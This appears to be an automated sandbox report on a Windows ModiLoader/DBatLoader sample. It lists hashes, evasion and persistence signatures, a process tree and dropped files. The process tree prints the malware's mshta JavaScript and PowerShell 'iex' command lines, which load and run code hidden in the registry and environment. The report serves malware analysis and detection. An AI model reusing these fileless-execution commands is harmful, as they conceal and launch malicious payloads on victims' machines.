Analysis

  • max time kernel: 149s
  • max time network: 150s
  • platform: windows7_x64
  • resource: win7-20240215-en
  • resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
  • submitted: 05-05-2024 10:38

General

  • Target: 174b618aa8d992af5b03d7d1e56d6549_JaffaCakes118.exe
  • Size: 265KB
  • MD5: 174b618aa8d992af5b03d7d1e56d6549
  • SHA1: e5d20982b70615d945102d9285bdab2c5841a804
  • SHA256: 68d575796afd7a48fdabc4ff88c4aa26a817ddc3b3bb1df8a9705b58d57aa534
  • SHA512: 10885d086f248c681ee37d9bb2ecc446fbea89215a8c09ea04268ddceb7aab3e3a598d57e6d7ebeaf9a8a9e64f3f61eb8bbbf7449566db417ec693c4c7330599
  • SSDEEP: 6144:veX94nYY+uUMFemOFu3Ksm2Yn+EE9j+ivEyPYxJQev:OSnYPweZnl+EER+iv6Iev

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process (1 IoCs)

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software (1 TTPs)

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry (2 TTPs, 1 IoCs)
  • Looks for VirtualBox drivers on disk (2 TTPs, 1 IoCs)
  • ModiLoader Second Stage (60 IoCs)
  • Looks for VMWare Tools registry key (2 TTPs, 1 IoCs)
  • Checks BIOS information in registry (2 TTPs, 2 IoCs)

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself (1 IoCs)
  • Drops startup file (1 IoCs)
  • Adds Run key to start application (2 TTPs, 3 IoCs)
  • Maps connected drives based on registry (3 TTPs, 2 IoCs)

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory (1 IoCs)
  • Suspicious use of SetThreadContext (3 IoCs)
  • Enumerates physical storage devices (1 TTPs)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings (1 TTPs, 3 IoCs)
  • Modifies registry class (7 IoCs)
  • Suspicious behavior: EnumeratesProcesses (64 IoCs)
  • Suspicious behavior: MapViewOfSection (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoCs)
  • Suspicious use of SetWindowsHookEx (1 IoCs)
  • Suspicious use of WriteProcessMemory (31 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\174b618aa8d992af5b03d7d1e56d6549_JaffaCakes118.exe (PID 1888, depth 1)
    Command line: "C:\Users\Admin\AppData\Local\Temp\174b618aa8d992af5b03d7d1e56d6549_JaffaCakes118.exe"
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory

    • C:\Users\Admin\AppData\Local\Temp\174b618aa8d992af5b03d7d1e56d6549_JaffaCakes118.exe (PID 2964, depth 2, child of PID 1888)
      Command line: "C:\Users\Admin\AppData\Local\Temp\174b618aa8d992af5b03d7d1e56d6549_JaffaCakes118.exe"

  • C:\Windows\system32\mshta.exe (PID 2680, depth 1)
    Command line: "C:\Windows\system32\mshta.exe" javascript:zmBQ1EBe="BdR";V8D=new%20ActiveXObject("WScript.Shell");BBZO8g="vqug3";R8g4ti=V8D.RegRead("HKLM\\software\\Wow6432Node\\6OaAcnU6oR\\uG8ll44Q");jXMAyZ5e="tS3";eval(R8g4ti);jFVWZ1p9="V";
    • Process spawned unexpected child process
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory

    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2972, depth 2, child of PID 2680)
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:ewmduqv
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory

      • C:\Windows\SysWOW64\regsvr32.exe (PID 548, depth 3, child of PID 2972)
        Command line: regsvr32.exe
        • Looks for VirtualBox Guest Additions in registry
        • Looks for VirtualBox drivers on disk
        • Looks for VMWare Tools registry key
        • Checks BIOS information in registry
        • Deletes itself
        • Drops startup file
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory

        • C:\Windows\SysWOW64\regsvr32.exe (PID 2320, depth 4, child of PID 548)
          Command line: "C:\Windows\SysWOW64\regsvr32.exe"

Downloads

  • C:\Users\Admin\AppData\Local\ed3e8\5cad4.cc93a6
    Filesize: 7KB
    MD5: 17c2feec8d8cd6c7175a63a3e22697e5
    SHA1: fddaa6208be9680e23e87b88ec707f3059418cc4
    SHA256: caebe694e9bc08a3ac62ec01f2ad555c3f698981108bec5f96ce0d9dca1ab4f3
    SHA512: 9fd8d3edd4aa39d5f7ef92fd807a8373ef549494cc4a9ad9825a16afefd32b9bf9dbf379562242ee78daca2a7b0e2f2c4c32e1e3f1d32d60549a7400abcf49b1

  • C:\Users\Admin\AppData\Local\ed3e8\bc0ec.bat
    Filesize: 58B
    MD5: c9726b1023d08f87d7c310ef440fc21a
    SHA1: e121739a7d5fd0bd5e0a08827105a41798195629
    SHA256: 009c0ef73332c5aae4e96ba2013e33cda30f312c604c5b1e768c190a522160fc
    SHA512: 571d0720f495a92114cdce0abbf951bd3ac6f66394adc88964c3870feb2552640290d65bf739c9e844e4f0c33ddbda9e39f6e66cfaad8a4b35a210df05efe1b0

  • C:\Users\Admin\AppData\Local\ed3e8\d468b.lnk
    Filesize: 865B
    MD5: 0bbae68e1bf27688101982818f2af721
    SHA1: eec23a77c10421c076a830e2f3a228787bf4ff77
    SHA256: f7930b6a95bbd17aca56b5b22416894250f8f3f6cd6a0a42053ccab36049049f
    SHA512: 786cba984e472130334c2320377caa12205e0f225b7c063236b7d89be07349fd8bcacef7ddaf20875718d109ea8657a795b971c402b4fdbf07e52b3eb4fe1223

  • C:\Users\Admin\AppData\Roaming\158f4\93aca.cc93a6
    Filesize: 2KB
    MD5: c526c054442dc01f31f327e717587dde
    SHA1: f4950bab882fb99e4082f561782e40562e22b747
    SHA256: 5cb02f1696f2c3040dc2ac67083be53d9be9a5ad74796b1aa68959acd5cdef19
    SHA512: 9a87f8c134131bc131ef55c21cee618488e98cc34116e87d33277a9808742039d980057e7e8eaca5b4f319319f678f112a0e553f82b5f9439c324c2ae37a3199

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2d7d1.lnk
    Filesize: 981B
    MD5: fa9687e971faaef2f479e4ead1b65832
    SHA1: 1cfca086655f3281621540a8c0d156c692eeac38
    SHA256: 56a483c24f498e18ba8c42e3a3d6b75705142ae1c40a101877126e860a9b10ff
    SHA512: 7df5ccf171cd6c9f62dd45f08a4f0f0f74cc36ba0ab7a938e03a65e9b29777d16dfcaa0fc52f79a7a778bf0fe5420f195625e9c7de024b5fdc7281739c531a57
